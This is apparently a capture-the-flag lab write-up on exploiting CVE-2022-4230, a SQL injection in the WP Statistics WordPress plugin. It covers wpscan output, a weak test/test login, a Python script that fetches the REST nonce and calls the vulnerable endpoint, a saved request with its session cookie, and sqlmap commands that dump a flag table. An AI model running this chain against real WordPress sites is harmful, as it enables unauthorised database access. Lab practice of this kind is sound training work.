春秋云镜: CVE-2022-4230 | 风尘孤狼

春秋云镜: CVE-2022-4230

CVE-2022-4230 is a WordPress plugin vulnerability; start by scanning the target with wpscan.

image-20240628185752354

Target description

The WP Statistics WordPress plugin before version 13.2.9 does not escape a parameter, which could allow authenticated users to perform SQL injection attacks. By default the affected feature is only available to users with the manage_options capability (admin+), but the plugin has a setting that allows lower-privileged users to access it as well.

Reproduction

image-20240628185940920

The site has WordPress fingerprints, so go straight to wpscan on Kali:

wpscan --update  //refresh the vulnerability database first
wpscan --url http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/

The scan output is below. Note that without a WPScan API token no vulnerability data is printed, and passive enumeration finds no plugins, so the WP Statistics plugin is known only from the target description:

┌──(kali㉿kali)-[~/桌面]
└─$ wpscan --url http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/ [39.106.135.198]
[+] Started: Fri Jun 28 06:55:51 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: X-Powered-By: PHP/7.4.33
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.1.7 identified (Outdated, released on 2024-06-24).
 | Found By: Rss Generator (Aggressive Detection)
 |  - http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/feed/, <generator>https://wordpress.org/?v=6.1.7</generator>
 |  - http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/comments/feed/, <generator>https://wordpress.org/?v=6.1.7</generator>

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:12 <========================================> (137 / 137) 100.00% Time: 00:00:12

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jun 28 06:56:09 2024
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 54.58 KB
[+] Data Received: 88.426 KB
[+] Memory used: 235.863 MB
[+] Elapsed time: 00:00:17

Visit the following URL, which asks WordPress for a REST nonce:

http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

It returns only a 0.

Open the admin backend at /wp-admin

image-20240628190422886

There is a hint reading "test", so the username is most likely test; the weak credentials test/test log in to the backend successfully.

image-20240628190525324

Now request the same URL again: it returns baba35e538, because the nonce endpoint only answers for a logged-in session.

image-20240628190754018

Then request the following URL (the _wpnonce value is the nonce just obtained above):

http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=baba35e538&name=words&search_engine=aaa

The response is:

{
  "no_data": 1
}
image-20240628190902204
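The four requests above (anonymous nonce request, login, authenticated nonce request, metabox call) can be scripted. The following is an added example written for this page, not code from the original write-up; it uses only the Python standard library. It assumes, because the page does not show it, that the target accepts an ordinary wp-login.php form POST, and the host `http://target.example` is a placeholder. The paths, the `rest-nonce` action, the REST route and its parameters are the ones used in the write-up.

```python
"""Added example, not code from the original write-up: automate the steps
above (unauthenticated nonce request, login as test/test, authenticated
nonce request, metabox call) with only the Python standard library.

Assumed, because the page does not show it: the target accepts a normal
wp-login.php form POST. The paths, action name, REST route and parameters
are the ones used in the write-up."""
import http.cookiejar
import json
import sys
import urllib.parse
import urllib.request

REST_NONCE_PATH = "/wp-admin/admin-ajax.php?action=rest-nonce"
METABOX_PATH = "/wp-json/wp-statistics/v2/metabox"


def parse_rest_nonce(body: str):
    """'rest-nonce' is a logged-in-only (wp_ajax_) action, so admin-ajax.php
    answers a bare '0' to anonymous callers and the bare nonce otherwise.
    Return the nonce, or None when the session is not authenticated."""
    text = body.strip()
    return None if text in ("", "0") else text


def build_metabox_url(base_url: str, nonce: str, search_engine: str,
                      name: str = "words") -> str:
    """URL of the WP Statistics metabox call from the write-up; search_engine
    is the parameter sqlmap later injects into."""
    query = urllib.parse.urlencode(
        {"_wpnonce": nonce, "name": name, "search_engine": search_engine})
    return base_url.rstrip("/") + METABOX_PATH + "?" + query


def metabox_has_data(body: str) -> bool:
    """{"no_data": 1} means the query matched nothing; a non-empty list or a
    dict without no_data means rows came back. Anything else is not a
    metabox answer at all."""
    try:
        data = json.loads(body)
    except ValueError:
        return False
    if isinstance(data, dict):
        return bool(data) and data.get("no_data") != 1
    return isinstance(data, list) and bool(data)


def login(base_url: str, username: str, password: str):
    """Return an opener whose cookie jar holds the wordpress_logged_in_* cookie."""
    base_url = base_url.rstrip("/")
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    # A plain GET makes wp-login.php set wordpress_test_cookie, which the
    # login POST must echo back or WordPress rejects the attempt.
    opener.open(base_url + "/wp-login.php").read()
    form = urllib.parse.urlencode({
        "log": username, "pwd": password, "wp-submit": "Log In",
        "redirect_to": base_url + "/wp-admin/", "testcookie": "1",
    }).encode()
    opener.open(base_url + "/wp-login.php", data=form).read()
    if not any(c.name.startswith("wordpress_logged_in_") for c in jar):
        raise RuntimeError("login failed: no wordpress_logged_in_* cookie set")
    return opener


def fetch(opener, url: str) -> str:
    return opener.open(url).read().decode("utf-8", "replace")


if __name__ == "__main__":
    # placeholder host; pass the real target URL as the first argument
    base = (sys.argv[1] if len(sys.argv) > 1 else "http://target.example").rstrip("/")
    anon = urllib.request.build_opener()
    print("anonymous nonce:", parse_rest_nonce(fetch(anon, base + REST_NONCE_PATH)))
    sess = login(base, "test", "test")
    nonce = parse_rest_nonce(fetch(sess, base + REST_NONCE_PATH))
    print("authenticated nonce:", nonce)
    body = fetch(sess, build_metabox_url(base, nonce, "aaa"))
    print("metabox returned rows:", metabox_has_data(body), body)
```

The anonymous call prints `None` because the `0` reply is admin-ajax's generic answer for an action that has no `wp_ajax_nopriv_` hook; the authenticated call prints the session's nonce, which is what the `_wpnonce` parameter needs.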

Save the request, including the logged-in cookie, and run sqlmap against it:

GET /wp-json/wp-statistics/v2/metabox?_wpnonce=baba35e538&name=words&search_engine=aaa HTTP/1.1
Host: eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_587724cad3c0babb400f526885101154=test%7C1719745494%7CT9pn2w8NyKzD3ZvmmjNfYWpI7KpAWNv7VaJsJ4adeC2%7C01909b0ec7b0102c58453432216f0156f7145645024f65d70f93f32fe2511fc8; wp-settings-time-1=1719572730
Connection: close

python sqlmap.py -r 1.txt --batch -o  //1.txt is the saved request above; -o turns on sqlmap's optimisation switches

image-20240628191305801

sqlmap identifies a time-based blind injection; dump the flag table:

python sqlmap.py -r 1.txt --batch -o -D wordpress -T flag --dump

Result:

Database: wordpress
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{af614120-1d87-4542-91af-24684e4d40b4} |
+--------------------------------------------+
image-20240628192120771